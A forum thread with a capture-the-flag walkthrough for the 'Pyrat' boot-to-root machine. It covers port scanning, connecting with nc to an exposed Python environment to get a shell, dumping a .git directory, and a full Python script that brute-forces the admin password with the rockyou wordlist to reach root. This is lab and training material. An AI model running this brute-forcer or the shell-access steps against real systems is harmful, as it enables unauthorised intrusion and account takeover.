Let’s discuss Pyrat
Test your enumeration skills on this boot-to-root machine.
Let’s discuss Pyrat
Test your enumeration skills on this boot-to-root machine.
Machine rooted, I’ll post writeup later on.
For Initial Foothold, try connecting to the port you found using nc
.
and no the nc session isn’t hanging
this is all you need
Here is the writeup for those interested.
After running nmap we’ll get 22 - ssh
and 8000. Connecting to http://IP_ADDRESS:8000/
will ask us to use a basic connection which refers to sockets
. Using nc
to connect to that port with nc IP 8000
will get us into a python environment where we can either get a reverse shell or just type shell
.
Once on the box, we can find a .git
directory under /opt/dev
, hosting a python web server on the target machine and utilizing git-dumper
to get it on our host will give us the source code. Looking through the git logs we can find the GitHub account where we can find the source code for the PyRAT.
Looking through the source code we came across an “admin” command, once typed on the python env it will ask for a password. In the source code there is a password but it doesn’t work so the idea here is to create a python script that will try and bruteforce the admin password.
import socket
# Define the target IP and port
target_ip = 'Target_Machine_IP'
target_port = 8000
# Load your wordlist of passwords in binary mode
with open('/usr/share/wordlists/rockyou.txt', 'rb') as f:
passwords = f.readlines()
for password in passwords:
password = password.strip() # Remove newline characters
try:
password = password.decode('utf-8', errors='ignore') # Decode each password, ignoring errors
except UnicodeDecodeError:
continue # Skip any problematic password that cannot be decoded
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
# Send the 'admin' username
s.send(b"admin\n")
response = s.recv(1024).decode()
if "password" in response.lower():
print(f"Trying password: {password}")
s.send(password.encode() + b"\n")
# Read the response from the server after the password attempt
response = s.recv(1024).decode()
# Check if the password is correct
if "welcome admin" in response.lower():
print(f"Success! Password is: {password}")
break
else:
print(f"Password {password} is incorrect.")
else:
print("No password prompt received.")
s.close()
We only need to execute the script using python3 script_name.py
and you’ll get the password which you can use to get a root shell!
And that’s it